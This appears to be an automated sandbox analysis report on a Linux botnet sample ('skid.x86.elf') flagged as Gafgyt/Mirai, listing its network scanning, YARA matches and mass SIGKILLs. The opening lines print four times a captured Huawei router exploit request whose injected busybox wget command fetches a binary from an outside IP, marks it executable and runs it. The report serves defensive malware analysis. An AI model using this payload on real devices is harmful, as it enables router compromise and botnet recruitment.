Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>

Sample listens on a socket

Source: /tmp/skid.x86.elf (PID: 5434)

Socket: 127.0.0.1::46372

Jump to behavior

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Source: global traffic

TCP traffic: 192.168.2.13:48202 -> 185.125.190.26:443

Source: unknown	TCP traffic detected without corresponding DNS query: 124.214.75.0
Source: unknown	TCP traffic detected without corresponding DNS query: 197.21.166.95
Source: unknown	TCP traffic detected without corresponding DNS query: 41.206.163.38
Source: unknown	TCP traffic detected without corresponding DNS query: 44.253.142.120
Source: unknown	TCP traffic detected without corresponding DNS query: 157.211.68.27
Source: unknown	TCP traffic detected without corresponding DNS query: 114.221.104.92
Source: unknown	TCP traffic detected without corresponding DNS query: 197.6.15.225
Source: unknown	TCP traffic detected without corresponding DNS query: 197.234.48.60
Source: unknown	TCP traffic detected without corresponding DNS query: 41.191.158.233
Source: unknown	TCP traffic detected without corresponding DNS query: 157.100.138.215
Source: unknown	TCP traffic detected without corresponding DNS query: 157.50.160.50
Source: unknown	TCP traffic detected without corresponding DNS query: 207.111.133.132
Source: unknown	TCP traffic detected without corresponding DNS query: 13.235.186.163
Source: unknown	TCP traffic detected without corresponding DNS query: 157.157.185.177
Source: unknown	TCP traffic detected without corresponding DNS query: 147.145.88.176
Source: unknown	TCP traffic detected without corresponding DNS query: 41.207.179.134
Source: unknown	TCP traffic detected without corresponding DNS query: 157.21.254.17
Source: unknown	TCP traffic detected without corresponding DNS query: 157.32.192.22
Source: unknown	TCP traffic detected without corresponding DNS query: 41.88.12.59
Source: unknown	TCP traffic detected without corresponding DNS query: 197.49.245.78
Source: unknown	TCP traffic detected without corresponding DNS query: 125.58.206.52
Source: unknown	TCP traffic detected without corresponding DNS query: 197.45.229.166
Source: unknown	TCP traffic detected without corresponding DNS query: 97.47.136.140
Source: unknown	TCP traffic detected without corresponding DNS query: 41.37.86.162
Source: unknown	TCP traffic detected without corresponding DNS query: 197.42.91.193
Source: unknown	TCP traffic detected without corresponding DNS query: 220.133.39.73
Source: unknown	TCP traffic detected without corresponding DNS query: 197.115.229.75
Source: unknown	TCP traffic detected without corresponding DNS query: 41.79.35.182
Source: unknown	TCP traffic detected without corresponding DNS query: 157.174.86.81
Source: unknown	TCP traffic detected without corresponding DNS query: 157.103.25.213
Source: unknown	TCP traffic detected without corresponding DNS query: 41.106.141.101
Source: unknown	TCP traffic detected without corresponding DNS query: 45.221.209.59
Source: unknown	TCP traffic detected without corresponding DNS query: 41.115.34.84
Source: unknown	TCP traffic detected without corresponding DNS query: 197.117.221.42
Source: unknown	TCP traffic detected without corresponding DNS query: 41.170.123.12
Source: unknown	TCP traffic detected without corresponding DNS query: 157.53.176.245
Source: unknown	TCP traffic detected without corresponding DNS query: 197.27.37.233
Source: unknown	TCP traffic detected without corresponding DNS query: 41.190.91.69
Source: unknown	TCP traffic detected without corresponding DNS query: 46.214.254.4
Source: unknown	TCP traffic detected without corresponding DNS query: 38.49.130.61
Source: unknown	TCP traffic detected without corresponding DNS query: 157.212.14.160
Source: unknown	TCP traffic detected without corresponding DNS query: 36.217.12.225
Source: unknown	TCP traffic detected without corresponding DNS query: 79.151.233.28
Source: unknown	TCP traffic detected without corresponding DNS query: 41.2.166.186
Source: unknown	TCP traffic detected without corresponding DNS query: 171.163.152.1
Source: unknown	TCP traffic detected without corresponding DNS query: 157.184.151.9
Source: unknown	TCP traffic detected without corresponding DNS query: 150.215.159.117
Source: unknown	TCP traffic detected without corresponding DNS query: 41.117.7.199
Source: unknown	TCP traffic detected without corresponding DNS query: 157.248.150.228
Source: unknown	TCP traffic detected without corresponding DNS query: 197.196.152.153

Source: unknown

DNS traffic detected: queries for: 9wg0dstmud.pirate

Source: unknown

Source: skid.x86.elf	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: skid.x86.elf	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

Source: unknown

Network traffic detected: HTTP traffic on port 48202 -> 443

System Summary

Malicious sample detected (through community Yara rule)

Source: skid.x86.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
Source: skid.x86.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
Source: skid.x86.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
Source: skid.x86.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
Source: skid.x86.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_d0c57a2e Author: unknown
Source: skid.x86.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
Source: skid.x86.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
Source: skid.x86.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
Source: skid.x86.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
Source: skid.x86.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
Source: 5434.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
Source: 5434.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
Source: 5434.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
Source: 5434.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
Source: 5434.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d0c57a2e Author: unknown
Source: 5434.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
Source: 5434.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
Source: 5434.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
Source: 5434.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
Source: 5434.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
Source: 5437.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
Source: 5437.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
Source: 5437.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
Source: 5437.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
Source: 5437.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d0c57a2e Author: unknown
Source: 5437.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
Source: 5437.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
Source: 5437.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
Source: 5437.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
Source: 5437.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown

Sample tries to kill multiple processes (SIGKILL)

Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 793, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 797, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 802, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1475, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1480, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1482, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1604, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1748, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1751, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1755, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1765, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1804, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1832, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1866, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1872, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1875, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1879, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1881, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1884, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1891, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1906, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1921, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1922, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1925, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1930, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1940, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1944, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1946, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1969, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1982, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 2926, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 2972, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 2974, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3095, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3104, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3117, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3122, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3161, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3162, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3163, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3164, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3165, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3170, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3182, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3208, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3209, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3212, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3225, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3246, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3300, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3327, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3336, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3342, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3375, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3413, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3420, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3424, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3429, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3434, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3448, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3631, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5458, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5460, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5462, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5499, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5503, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5504, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5507, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5523, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5539, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5540, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5544, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5545, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5546, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5566, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5605, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5611, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5613, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5614, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5615, result: successful	Jump to behavior

